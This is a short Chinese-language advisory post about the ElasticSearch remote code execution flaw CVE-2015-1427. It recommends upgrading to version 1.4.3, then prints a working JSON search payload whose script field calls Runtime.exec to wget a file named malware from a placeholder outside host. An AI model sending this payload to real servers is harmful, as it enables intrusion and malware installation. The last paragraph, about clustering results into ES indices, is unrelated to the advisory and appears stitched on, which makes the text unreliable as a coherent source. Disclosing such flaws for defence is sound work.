sifeimeng 2015-05-18
ElasticSearch 提供了一个扩展 JSON API ,提供搜索以及系统管理的功能。该 API 日前爆出编号为 CVE-2015-1427 的远程代码执行漏洞,该漏洞源于一篇博客的介绍,请看 here (translated).
可通过升级到 1.4.3 或者更新版本来修复这个漏洞。否则如果你的 ElasticSearch 暴露在互联网就可能通过如下代码来执行远程代码:
{"query":
{"filtered": {
"query": {"match_all": {}}}},
"script_fields": {"exp": {
"script": "import java.util.*;import java.io.*;String str = \"\";BufferedReader br = new BufferedReader(new InputStreamReader(Runtime.getRuntime().exec(\"wget -O /tmp/malware http://x.x.x.x/malware \").getInputStream()));StringBuilder sb = new StringBuilder();while((str=br.readLine())!=null){sb.append(str);sb.append(\"\r\n\");}sb.toString();"
}}}
关于该漏洞的详细介绍和原理请看此文。
ElasticSearch 的详细介绍:请点这里
ElasticSearch 的下载地址:请点这里
另外一部分,则需要先做聚类、分类处理,将聚合出的分类结果存入ES集群的聚类索引中。数据处理层的聚合结果存入ES中的指定索引,同时将每个聚合主题相关的数据存入每个document下面的某个field下。